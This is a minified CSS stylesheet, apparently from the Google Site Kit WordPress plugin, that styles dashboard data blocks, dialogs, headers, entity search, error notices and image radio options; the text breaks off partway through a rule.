.googlesitekit-header--has-subheader+.googlesitekit-subheader+.googlesitekit-navigation--is-sticky::before{opacity:0;transition:opacity .1s ease-out}.googlesitekit-data-block{--color-up: #46732b;--color-down: #ac4220;position:relative;text-align:left}.post-php .googlesitekit-data-block{min-width:150px}.googlesitekit-wp-dashboard .googlesitekit-data-block{padding-top:12px}.googlesitekit-data-block .googlesitekit-data-block__title{align-items:flex-start;color:#6c726e;display:flex;flex:1;flex-direction:column;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-weight:700;justify-content:flex-start;margin:0 0 12px;row-gap:8px}.googlesitekit-data-block .googlesitekit-data-block__title .googlesitekit-new-badge{margin-left:0}.googlesitekit-data-block.googlesitekit-data-block--button .googlesitekit-data-block__title{align-items:center}.googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__title{font-size:16px;font-weight:700;letter-spacing:.5px;margin-bottom:5px}#dashboard-widgets .googlesitekit-wp-dashboard .googlesitekit-data-block .googlesitekit-data-block__title{font-size:12px;letter-spacing:.2px}.googlesitekit-data-block .googlesitekit-data-block__title-inner{align-items:center;display:flex;flex:1}.googlesitekit-data-block .googlesitekit-data-block__title-datapoint-wrapper{display:flex;flex:1;flex-flow:column}.googlesitekit-data-block .googlesitekit-data-block__datapoint{color:#161b18;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:46px;font-weight:500;line-height:1.13;margin:0;text-wrap:nowrap}.googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__datapoint{display:inline-block;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:38px;line-height:1.158;margin-right:5px}.googlesitekit-wp-dashboard .googlesitekit-data-block .googlesitekit-data-block__datapoint{font-size:32px}.googlesitekit-data-block .googlesitekit-data-block__change{color:#6c726e;font-size:12px;letter-spacing:.2px;line-height:1;margin-top:16px;text-transform:none}.googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__change{display:inline-block;font-size:16px;letter-spacing:.5px;margin-top:0}.googlesitekit-wp-dashboard .googlesitekit-data-block .googlesitekit-data-block__change{margin-top:10px}.googlesitekit-data-block .googlesitekit-data-block__change--no-change{visibility:hidden}.googlesitekit-data-block .googlesitekit-data-block__sparkline{margin-top:8px;max-width:150px}.googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__sparkline{display:none}.googlesitekit-data-block .googlesitekit-data-block__arrow{display:inline-block;line-height:1;margin-right:2px;vertical-align:baseline}.googlesitekit-data-block .googlesitekit-data-block__arrow--reverse{transform:rotate(180deg)}#wpadminbar .googlesitekit-data-block .googlesitekit-data-block__arrow .svg{height:9px;width:9px}.googlesitekit-data-block .googlesitekit-data-block__suffix{margin-left:4px}.googlesitekit-data-block .googlesitekit-data-block__value,.googlesitekit-data-block .googlesitekit-data-block__suffix{color:#6c726e;display:inline-block;font-size:12px;font-weight:500;letter-spacing:.2px;line-height:1.33;text-transform:none}.googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__value,.googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__suffix{font-size:16px;font-weight:400;letter-spacing:.5px}.googlesitekit-data-block .googlesitekit-data-block__value--up,.googlesitekit-data-block .googlesitekit-data-block__suffix--up{color:var(--color-up)}.googlesitekit-data-block .googlesitekit-data-block__value--down,.googlesitekit-data-block .googlesitekit-data-block__suffix--down{color:var(--color-down)}.googlesitekit-data-block .googlesitekit-data-block__source{font-size:12px;letter-spacing:.2px;margin-top:8px}@media(min-width: 960px){.googlesitekit-data-block .googlesitekit-data-block__source{margin-top:12px}}.googlesitekit-data-block--button .googlesitekit-data-block__sparkline{margin:8px auto 0 auto}.googlesitekit-data-block--button{cursor:pointer;display:flex;flex-direction:column;height:100%;justify-content:flex-end;padding-bottom:16px;padding-top:20px;text-align:center;transition:background-color .2s ease-in-out}@media(min-width: 960px){.googlesitekit-data-block--button{padding-bottom:24px;padding-top:28px}}.googlesitekit-data-block--button::before{content:"";height:4px;left:0;opacity:0;position:absolute;right:0;top:0;transition:opacity .2s ease-in-out}.googlesitekit-data-block--selected::before{opacity:1}.googlesitekit-data-block--button-1:not(.googlesitekit-data-block--is-gathering-data):hover,.googlesitekit-data-block--button-1:not(.googlesitekit-data-block--is-gathering-data):focus,.googlesitekit-data-block--button-1:not(.googlesitekit-data-block--is-gathering-data):active{background-color:rgba(99,128,184,.1)}.googlesitekit-data-block--button-1.googlesitekit-data-block--is-gathering-data::before{background-color:#999f9b}.googlesitekit-data-block--button-1.googlesitekit-data-block--is-gathering-data.googlesitekit-data-block--selected::before{opacity:.6}.googlesitekit-data-block--button-1::before{background-color:#6380b8}.googlesitekit-data-block--button-2:not(.googlesitekit-data-block--is-gathering-data):hover,.googlesitekit-data-block--button-2:not(.googlesitekit-data-block--is-gathering-data):focus,.googlesitekit-data-block--button-2:not(.googlesitekit-data-block--is-gathering-data):active{background-color:rgba(75,187,187,.1)}.googlesitekit-data-block--button-2.googlesitekit-data-block--is-gathering-data::before{background-color:#999f9b}.googlesitekit-data-block--button-2.googlesitekit-data-block--is-gathering-data.googlesitekit-data-block--selected::before{opacity:.6}.googlesitekit-data-block--button-2::before{background-color:#4bbbbb}.googlesitekit-data-block--button-3:not(.googlesitekit-data-block--is-gathering-data):hover,.googlesitekit-data-block--button-3:not(.googlesitekit-data-block--is-gathering-data):focus,.googlesitekit-data-block--button-3:not(.googlesitekit-data-block--is-gathering-data):active{background-color:rgba(92,146,113,.1)}.googlesitekit-data-block--button-3.googlesitekit-data-block--is-gathering-data::before{background-color:#999f9b}.googlesitekit-data-block--button-3.googlesitekit-data-block--is-gathering-data.googlesitekit-data-block--selected::before{opacity:.6}.googlesitekit-data-block--button-3::before{background-color:#5c9271}.googlesitekit-data-block--button-4:not(.googlesitekit-data-block--is-gathering-data):hover,.googlesitekit-data-block--button-4:not(.googlesitekit-data-block--is-gathering-data):focus,.googlesitekit-data-block--button-4:not(.googlesitekit-data-block--is-gathering-data):active{background-color:rgba(110,72,171,.1)}.googlesitekit-data-block--button-4.googlesitekit-data-block--is-gathering-data::before{background-color:#999f9b}.googlesitekit-data-block--button-4.googlesitekit-data-block--is-gathering-data.googlesitekit-data-block--selected::before{opacity:.6}.googlesitekit-data-block--button-4::before{background-color:#6e48ab}.googlesitekit-plugin .googlesitekit-data-block__loading{align-items:center;display:flex;flex-direction:row}.googlesitekit-plugin .googlesitekit-data-block--is-gathering-data{cursor:auto}.admin-bar .googlesitekit-plugin .googlesitekit-dialog{align-items:stretch}@media(min-width: 600px){.admin-bar .googlesitekit-plugin .googlesitekit-dialog{align-items:center}}.googlesitekit-plugin .googlesitekit-dialog .mdc-dialog__container{height:100%;max-width:908px;width:100%}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-dialog .mdc-dialog__container{height:auto;max-height:calc(100vh - 120px);width:80%}}.googlesitekit-plugin .googlesitekit-dialog .mdc-dialog__surface{border-radius:0;box-shadow:none;max-height:100%;max-width:100%;padding:0;width:100%}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-dialog .mdc-dialog__surface{border-radius:24px;height:auto}}.googlesitekit-plugin .googlesitekit-dialog .googlesitekit-dialog__back-wrapper{padding:20px 16px}.googlesitekit-plugin .googlesitekit-dialog .googlesitekit-dialog__back-wrapper[aria-hidden=true]{display:none}.googlesitekit-plugin .googlesitekit-dialog .googlesitekit-dialog__back{background-color:transparent;border-radius:0;box-shadow:none;min-height:auto;min-width:auto;padding:0;width:24px}.googlesitekit-plugin .googlesitekit-dialog .googlesitekit-dialog__back:focus{outline:1px dotted #6380b8;outline-offset:3px}.googlesitekit-plugin .googlesitekit-dialog .googlesitekit-dialog__back .mdc-button__label{height:24px;line-height:1}.googlesitekit-plugin .googlesitekit-dialog .googlesitekit-dialog__content{overflow:auto;padding:24px 16px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-dialog .googlesitekit-dialog__content{padding:32px}}.googlesitekit-plugin .googlesitekit-dialog .googlesitekit-dialog__header{display:flex;flex-wrap:nowrap;gap:12px;margin:0 0 32px}.googlesitekit-plugin .googlesitekit-dialog .googlesitekit-dialog__header-icon span{align-items:center;background-color:#46732b;border-radius:50%;color:#fff;display:flex;height:36px;justify-content:center;width:36px}.googlesitekit-plugin .googlesitekit-dialog .googlesitekit-dialog__header-icon[aria-hidden=true]{display:none}.googlesitekit-plugin .googlesitekit-dialog .googlesitekit-dialog__title{color:#161b18;margin:0 0 12px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-dialog .googlesitekit-dialog__title{margin:0 0 8px}}.googlesitekit-plugin .googlesitekit-dialog .googlesitekit-dialog__subtitle{color:#6c726e;font-size:12px;letter-spacing:.2px;line-height:1.33;margin:0}.googlesitekit-plugin .googlesitekit-dialog .googlesitekit-dialog__subtitle--emphasis{font-size:14px}.googlesitekit-plugin .googlesitekit-dialog .googlesitekit-dialog__footer{border-top:1px solid #ebeef0;justify-content:flex-end;margin:0;padding:16px;z-index:2}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-dialog .googlesitekit-dialog__footer{padding:20px 32px}}.googlesitekit-device-size-tab-bar{border-radius:100px;overflow:hidden;width:auto}.googlesitekit-device-size-tab-bar .mdc-tab-scroller__scroll-content button.mdc-tab{background:#ebeef0;height:32px;width:56px}.googlesitekit-device-size-tab-bar .mdc-tab-scroller__scroll-content button.mdc-tab:first-child{border-radius:100px 0 0 100px}.googlesitekit-device-size-tab-bar .mdc-tab-scroller__scroll-content button.mdc-tab:last-child{border-radius:0 100px 100px 0}.googlesitekit-device-size-tab-bar .mdc-tab-scroller__scroll-content button.mdc-tab svg{color:#5f6561}.googlesitekit-device-size-tab-bar .mdc-tab-scroller__scroll-content button.mdc-tab.mdc-tab--active{background:#3c7251}.googlesitekit-device-size-tab-bar .mdc-tab-scroller__scroll-content button.mdc-tab.mdc-tab--active svg{color:#fff}.googlesitekit-device-size-tab-bar .mdc-tab-scroller__scroll-content button.mdc-tab .mdc-tab-indicator{display:none}.googlesitekit-device-size-tab-bar .mdc-tab--active[disabled]{background-color:#999f9b;opacity:.6}.googlesitekit-dropdown-menu .googlesitekit-header__dropdown:focus{outline:0}.googlesitekit-dropdown-menu .mdc-list-item .googlesitekit-cta-link:hover,.googlesitekit-dropdown-menu .googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item .googlesitekit-cta-link:hover,.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-dropdown-menu .googlesitekit-view-only-menu__list-item .googlesitekit-cta-link:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-dropdown-menu.googlesitekit-dropdown-menu__icon-menu .mdc-button--dropdown{background-image:none;color:#6c726e;padding-right:8px}.googlesitekit-dropdown-menu .mdc-button--dropdown[aria-expanded=true]{background-color:#ebeef0;color:rgba(0,0,0,.87)}.googlesitekit-plugin .googlesitekit-entity-header{align-items:center;background-color:#fff;border-bottom:1px solid transparent;color:#6c726e;display:flex;justify-content:space-between;padding:16px;-webkit-position:sticky;position:sticky;top:120px;z-index:9}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-entity-header{padding-left:36px;padding-right:36px}}.googlesitekit-navigation--is-sticky+.googlesitekit-plugin .googlesitekit-entity-header{border-bottom:1px solid #ebeef0}@media(min-width: 601px){body.admin-bar .googlesitekit-plugin .googlesitekit-entity-header{top:183px}}@media(min-width: 783px){body.admin-bar .googlesitekit-plugin .googlesitekit-entity-header{top:169px}}@media(min-width: 961px){body.admin-bar .googlesitekit-plugin .googlesitekit-entity-header{top:185px}}body.googlesitekit-showing-feature-tour .googlesitekit-plugin .googlesitekit-entity-header,body.googlesitekit-showing-tooltip .googlesitekit-plugin .googlesitekit-entity-header{position:static}.googlesitekit-plugin .googlesitekit-entity-header__back{height:auto;min-width:20%;padding-right:30px}.googlesitekit-plugin .googlesitekit-entity-header__back::before,.googlesitekit-plugin .googlesitekit-entity-header__back::after{display:none}.googlesitekit-plugin .googlesitekit-entity-header__back .mdc-button{height:100%;padding-left:0}.googlesitekit-plugin .googlesitekit-entity-header__back .mdc-button:not(:disabled){color:#6c726e}.googlesitekit-plugin .googlesitekit-entity-header__back .mdc-button:not(:disabled):hover{background-color:rgba(22,27,24,.08);color:#161b18;-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .googlesitekit-entity-header__back .mdc-button:not(:disabled):hover::before{background-color:rgba(22,27,24,.08);opacity:1}.googlesitekit-plugin .googlesitekit-entity-header__back .mdc-button__label{font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;font-weight:500;letter-spacing:.25px;line-height:1.43;margin:0 0 0 8px;text-align:left;text-transform:none}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-entity-header__back .mdc-button__label{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif}}.googlesitekit-plugin .googlesitekit-entity-header__details{font-size:12px;font-weight:500;letter-spacing:.2px;line-height:1.33;overflow:hidden;text-align:right;white-space:nowrap;width:100%}.googlesitekit-plugin .googlesitekit-entity-header__details p{font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:12px;letter-spacing:.2px;line-height:1.33;margin:0;overflow:hidden;text-overflow:ellipsis}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-entity-header__details p{margin:0}}.googlesitekit-plugin .googlesitekit-entity-header__details a{margin:4px;max-width:100%;-webkit-text-decoration:underline;text-decoration:underline}.googlesitekit-plugin .googlesitekit-entity-header__details a:hover,.googlesitekit-plugin .googlesitekit-entity-header__details a:focus{color:#2e5f41}.googlesitekit-plugin .googlesitekit-entity-search{background-color:#fff;position:relative}.googlesitekit-plugin .googlesitekit-entity-search .googlesitekit-entity-search__actions{position:absolute;right:17px;top:50%;transform:translateY(-50%);z-index:3}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-entity-search .googlesitekit-entity-search__actions{right:2px}}.googlesitekit-plugin .googlesitekit-entity-search .googlesitekit-entity-search__actions svg{color:#5f6561}.googlesitekit-plugin .googlesitekit-entity-search .googlesitekit-entity-search__close{height:30px;width:30px}@media(max-width: 960px){.googlesitekit-plugin .googlesitekit-entity-search .googlesitekit-entity-search__close{border-radius:50%}}.googlesitekit-plugin .googlesitekit-entity-search .googlesitekit-entity-search__loading{border-radius:0 0 16px 16px;bottom:-4px;position:absolute;right:4px;width:calc(100% - 8px);z-index:4}@media(min-width: 783px){.googlesitekit-plugin .googlesitekit-entity-search .googlesitekit-entity-search__loading{bottom:-4px;left:0;margin:0 auto;right:0;width:calc(100% - 25px)}}.googlesitekit-plugin .googlesitekit-entity-search .autocomplete__wrapper{margin:0}.googlesitekit-plugin .googlesitekit-entity-search .autocomplete__input{border:none;border-radius:100px;font-size:14px;height:34px;letter-spacing:.25px;margin:0;padding:0 32px 0 0}@media(min-width: 783px){.googlesitekit-plugin .googlesitekit-entity-search .autocomplete__input{border:1px solid #b8bdb9;padding:0 32px 0 16px}}.googlesitekit-plugin .googlesitekit-entity-search .autocomplete__input:hover{border-color:#161b18}.googlesitekit-plugin .googlesitekit-entity-search .autocomplete__input:focus{border-color:#3c7251;border-width:2px}.googlesitekit-plugin .googlesitekit-entity-search .autocomplete__menu{box-shadow:0 1.25px 5px 0 rgba(0,0,0,.19),0 .33px 1.5px 0 rgba(0,0,0,.039);background-color:#fff;border-radius:16px;margin-left:-12px;overflow:hidden;padding:0;top:calc(100% + 14px);width:calc(100% + 24px)}@media(min-width: 783px){.googlesitekit-plugin .googlesitekit-entity-search .autocomplete__menu{margin:0;top:calc(100% + 1px);width:100%}}.googlesitekit-plugin .googlesitekit-entity-search .autocomplete__option{color:#161b18;font-size:14px;letter-spacing:.25px;line-height:1}.googlesitekit-plugin .googlesitekit-entity-search .autocomplete__option:first-child{border-radius:16px 16px 0 0}.googlesitekit-plugin .googlesitekit-entity-search .autocomplete__option:last-child{border-radius:0 0 16px 16px}.googlesitekit-plugin .googlesitekit-entity-search .autocomplete__option--focused,.googlesitekit-plugin .googlesitekit-entity-search .autocomplete__option:hover,.googlesitekit-plugin .googlesitekit-entity-search .autocomplete__option[data-highlighted]{background-color:rgba(22,27,24,.08);cursor:pointer;opacity:1;transition:none}.googlesitekit-plugin .googlesitekit-entity-search .autocomplete__option--no-results,.googlesitekit-plugin .googlesitekit-entity-search .autocomplete__option--no-results:hover,.googlesitekit-plugin .googlesitekit-entity-search .autocomplete__option--no-results[data-highlighted]{background:none;cursor:default}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-entity-search .mdc-button__label{line-height:0}}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-entity-search .mdc-button__label+svg{margin-left:8px}}.googlesitekit-plugin .googlesitekit-entity-search .mdc-button{color:#6c726e;letter-spacing:.3px;min-width:auto;outline:none;text-transform:none}.googlesitekit-plugin .googlesitekit-entity-search .mdc-button:hover,.googlesitekit-plugin .googlesitekit-entity-search .mdc-button:active,.googlesitekit-plugin .googlesitekit-entity-search .mdc-button:focus{background-color:unset;color:rgba(0,0,0,.87);-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .googlesitekit-entity-search .mdc-button:hover::before,.googlesitekit-plugin .googlesitekit-entity-search .mdc-button:hover::after,.googlesitekit-plugin .googlesitekit-entity-search .mdc-button:active::before,.googlesitekit-plugin .googlesitekit-entity-search .mdc-button:active::after,.googlesitekit-plugin .googlesitekit-entity-search .mdc-button:focus::before,.googlesitekit-plugin .googlesitekit-entity-search .mdc-button:focus::after{background-color:rgba(22,27,24,.08);opacity:1;transition:none}.googlesitekit-plugin .googlesitekit-entity-search--is-open{flex:1}@media(max-width: 783px){.googlesitekit-plugin .googlesitekit-entity-search--is-open{align-items:center;display:flex;left:0;margin:0;max-height:68px;padding:14px 16px;position:absolute;right:0;top:0;z-index:1}}.googlesitekit-plugin .googlesitekit-error-handler .googlesitekit-banner__content{overflow:auto}.googlesitekit-plugin .googlesitekit-error-handler .mdc-button:not(:disabled){background-color:#ac4220}.googlesitekit-plugin .googlesitekit-error-handler .mdc-button:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-plugin .googlesitekit-error-handler .mdc-button::before,.googlesitekit-plugin .googlesitekit-error-handler .mdc-button::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .googlesitekit-error-handler .mdc-button::before,.googlesitekit-plugin .googlesitekit-error-handler .mdc-button::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-plugin .googlesitekit-error-handler .mdc-button:hover::before{opacity:.08}.googlesitekit-plugin .googlesitekit-error-handler .mdc-button:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .googlesitekit-error-handler .mdc-button.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .googlesitekit-error-handler .mdc-button:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .googlesitekit-error-handler .mdc-button:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .googlesitekit-error-handler .mdc-button.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-error-text{color:#ac4220;font-weight:500}.googlesitekit-error-retry-text{color:#ac4220;margin-left:1rem}.googlesitekit-report-error-actions{align-items:center;display:flex;flex-wrap:wrap;gap:1rem}.googlesitekit-plugin .googlesitekit-google-tag-gateway-toggle .googlesitekit-google-tag-gateway-toggle__progress{margin:11.5px 0}.googlesitekit-plugin .googlesitekit-google-tag-gateway-toggle .googlesitekit-notice--warning{margin-top:10px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-google-tag-gateway-toggle .googlesitekit-notice--warning{padding:14px 24px}}.googlesitekit-plugin .googlesitekit-google-tag-gateway-toggle .googlesitekit-badge{margin-left:6px}.googlesitekit-plugin .googlesitekit-gathering-data-notice{text-transform:lowercase}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-small span{color:#6c726e;display:block;font-size:28px;line-height:1.286;padding:0}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-small span{font-size:12px;letter-spacing:.2px;line-height:1.33;padding:0}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-default{position:relative;text-align:inherit}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-default span{color:#6c726e;display:block;font-size:28px;line-height:1.286;padding:0}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-overlay{align-items:center;display:flex;height:100%;justify-content:center;left:0;position:absolute;top:0;width:100%}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-overlay span{color:#6c726e;display:block;font-size:28px;line-height:1.286;padding:0}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-small-overlay{align-items:center;display:flex;height:100%;justify-content:center;left:0;position:absolute;top:0;width:100%}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-small-overlay span{color:#6c726e;display:block;font-size:28px;line-height:1.286;padding:0}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-small-overlay span{font-size:18px;line-height:1.33;max-width:80px;padding:0;text-align:center}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-large span{color:#6c726e;display:block;font-size:28px;line-height:1.286;padding:0}#wpadminbar .googlesitekit-plugin .googlesitekit-gathering-data-notice span{color:#999f9b;font-size:12px;letter-spacing:.2px;line-height:1.33;text-transform:lowercase}.googlesitekit-plugin .googlesitekit-generic-error-handler-actions{align-items:flex-start;display:flex;flex-direction:column;gap:16px;margin-block-start:16px}.googlesitekit-plugin .googlesitekit-subheader{background-color:#fff;position:relative;z-index:11}.googlesitekit-plugin .googlesitekit-subheader:not(:empty){border-bottom:1px solid #ebeef0}.googlesitekit-plugin .googlesitekit-header{background-color:#fff;left:0;position:sticky;right:0;top:0;transition:box-shadow .2s ease-in-out;z-index:9980}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-header{padding-left:10px;padding-right:10px}}.wp-responsive-open .googlesitekit-plugin .googlesitekit-header{margin-left:-18px;padding-left:28px}body.googlesitekit-showing-feature-tour .googlesitekit-plugin .googlesitekit-header,body.googlesitekit-showing-tooltip .googlesitekit-plugin .googlesitekit-header{position:static}@media(min-width: 601px){body.admin-bar .googlesitekit-plugin .googlesitekit-header{top:46px}}@media(min-width: 783px){body.admin-bar .googlesitekit-plugin .googlesitekit-header{top:32px}}.googlesitekit-plugin .googlesitekit-header .googlesitekit-header__logo{min-width:150px}@media(max-width: 449px){.googlesitekit-plugin .googlesitekit-header .googlesitekit-header__logo{min-width:100px}}.googlesitekit-plugin .googlesitekit-header .googlesitekit-header__logo-link{display:inline-block}.googlesitekit-plugin .googlesitekit-header .googlesitekit-header__button{align-items:center;background-color:transparent;cursor:pointer;display:flex;font-size:12px;letter-spacing:.2px;margin-right:-8px;padding:8px;transition:background-color .2s ease-in-out,color .2s ease-in-out}.googlesitekit-plugin .googlesitekit-header .googlesitekit-header__button:hover{background-color:#446199;color:#fff;-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .googlesitekit-header .googlesitekit-header__button svg{fill:currentColor;margin-left:8px}.googlesitekit-plugin .googlesitekit-header .googlesitekit-dropdown-menu{display:inline-block}.googlesitekit-plugin .googlesitekit-header .googlesitekit-dropdown-menu .mdc-button__icon{margin-right:12px}.googlesitekit-plugin .googlesitekit-header .googlesitekit-dropdown-menu .mdc-button__account{margin-right:0}.googlesitekit-plugin .googlesitekit-header .googlesitekit-dropdown-menu .mdc-button__icon,.googlesitekit-plugin .googlesitekit-header .googlesitekit-dropdown-menu .mdc-button__icon--image{height:28px;width:28px}.googlesitekit-plugin .googlesitekit-header .googlesitekit-dropdown-menu .mdc-button__label{font-weight:400}.googlesitekit-plugin .googlesitekit-header .googlesitekit-dropdown-menu .mdc-list-item:hover::before,.googlesitekit-plugin .googlesitekit-header .googlesitekit-dropdown-menu .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item:hover::before,.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-header .googlesitekit-dropdown-menu .googlesitekit-view-only-menu__list-item:hover::before{background-color:rgba(22,27,24,.08);opacity:1;transition:none}@media(max-width: 599px){.googlesitekit-plugin .googlesitekit-header .googlesitekit-date-range-selector{background:none}}.googlesitekit-plugin .googlesitekit-header .googlesitekit-date-range-selector svg{margin-right:0}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-header .googlesitekit-date-range-selector svg{margin-right:8px}}.googlesitekit-plugin .googlesitekit-header .googlesitekit-date-range-selector .mdc-button--dropdown{color:#6c726e;padding-right:24px}@media(max-width: 599px){.googlesitekit-plugin .googlesitekit-header .googlesitekit-date-range-selector .mdc-button--dropdown{background:none;margin-right:0;padding-right:8px}}.googlesitekit-plugin .googlesitekit-header .googlesitekit-date-range-selector .mdc-button--dropdown:hover{background-color:unset;color:#161b18}.googlesitekit-plugin .googlesitekit-header .googlesitekit-date-range-selector .mdc-button--dropdown:hover::before{background-color:rgba(22,27,24,.08);opacity:1;transition:none}@media(max-width: 599px){.googlesitekit-plugin .googlesitekit-header .googlesitekit-date-range-selector .mdc-button--dropdown svg{margin-right:0}}.googlesitekit-plugin .googlesitekit-header .googlesitekit-date-range-selector .mdc-menu-surface{right:0}.googlesitekit-plugin .googlesitekit-header .googlesitekit-dropdown-menu.googlesitekit-dropdown-menu__icon-menu .mdc-button--dropdown:hover{background-color:unset;color:#161b18}.googlesitekit-plugin .googlesitekit-header .googlesitekit-dropdown-menu.googlesitekit-dropdown-menu__icon-menu .mdc-button--dropdown:hover::before{background-color:rgba(22,27,24,.08);opacity:1;transition:none}.googlesitekit-plugin .googlesitekit-header .googlesitekit-header__children{align-items:center;display:flex;gap:16px;justify-content:flex-end}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-header .googlesitekit-header__children{gap:24px}}.googlesitekit-plugin .googlesitekit-header .googlesitekit-header__children div>button>.mdc-button__label{display:none}@media(min-width: 784px){.googlesitekit-plugin .googlesitekit-header .googlesitekit-header__children div>button>.mdc-button__label{display:inline-block}}.googlesitekit-plugin .googlesitekit-help-menu-link{padding:0}.googlesitekit-plugin .googlesitekit-help-menu-link:hover{background-color:unset;color:rgba(0,0,0,.87)}.googlesitekit-plugin .googlesitekit-help-menu-link:hover::before{background-color:rgba(22,27,24,.08);opacity:1}.googlesitekit-plugin .googlesitekit-help-menu-link .googlesitekit-cta-link{align-items:center;color:#161b18;display:flex;height:100%;padding:0 16px;width:100%}.googlesitekit-plugin .googlesitekit-help-menu .mdc-list{padding:12px 0}.googlesitekit-plugin .googlesitekit-help-menu .mdc-list-item,.googlesitekit-plugin .googlesitekit-help-menu .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item,.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-help-menu .googlesitekit-view-only-menu__list-item{height:44px}.googlesitekit-plugin .googlesitekit-help-menu .googlesitekit-cta-link{letter-spacing:.25px;line-height:20px;padding:0 24px}.googlesitekit-plugin .googlesitekit-help-menu .googlesitekit-cta-link .googlesitekit-icon-wrapper{margin-right:16px !important}.googlesitekit-plugin .googlesitekit-help-menu .googlesitekit-cta-link svg{fill:none}.googlesitekit-plugin .googlesitekit-icon-wrapper{align-items:center;display:inline-flex}.googlesitekit-plugin .googlesitekit-image-radio-options{display:flex;flex-wrap:wrap;gap:24px}.googlesitekit-plugin .googlesitekit-image-radio{display:flex;flex-direction:column;width:100%}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-image-radio{max-width:16.5rem}}.googlesitekit-plugin .googlesitekit-image-radio>label{color:#5f6561;font-size:.75rem;margin-top:.625rem;padding:0}.googlesitekit-plugin .googlesitekit-image-radio>label span{color:#161b18;display:block;font-size:.875rem;margin-bottom:.125rem}.googlesitekit-plugin .googlesitekit-image-radio .image-radio{--mdc-ripple-fg-size: 0 !important;height:unset;padding:0;width:100%}.googlesitekit-plugin .googlesitekit-image-radio .image-radio .mdc-image-radio__background .mdc-image-radio__content{align-items:center;background-color:#fff;border:.375rem solid #fff;border-radius:.5625rem;color:#161b18;display:flex;justify-content:center;min-height:12.1875rem}.googlesitekit-plugin .googlesitekit-image-radio .image-radio .mdc-image-radio__background .mdc-image-radio__content svg{object-fit:contain;width:100%}.googlesitekit-plugin .googlesitekit-image-radio .image-radio .mdc-image-radio__background::after{border:.0625rem solid #999f9b;border-radius:.5625rem;content:"";height:100%;left:0;position:absolute;top:0;width:100%}.googlesitekit-plugin .googlesitekit-image-radio .image-radio .mdc-image-radio__background .mdc-image-radio__content--no-image{background-color:#ebeef0;min-height:5.0625rem;text-align:center}.googlesitekit-plugin .googlesitekit-image-radio .image-radio .mdc-image-radio__background--checked::after{border:.1875rem solid #3c7251}.googlesitekit-plugin .googlesitekit-image-radio .image-radio:hover .mdc-image-radio__content{position:relative}.googlesitekit-plugin .googlesitekit-image-radio .image-radio:hover .mdc-image-radio__content::after{background-color:#cbd0d3;border-radius:.5625rem;content:"";height:calc(100% + 0.75rem);left:50%;opacity:.3;position:absolute;top:50%;transform:translate(-50%, -50%);width:calc(100% + 0.75rem)}.googlesitekit-plugin .googlesitekit-image-radio .image-radio:hover .mdc-image-radio__content--no-image{background-color:#cbd0d3}.googlesitekit-plugin .googlesitekit-image-radio .image-radio:hover 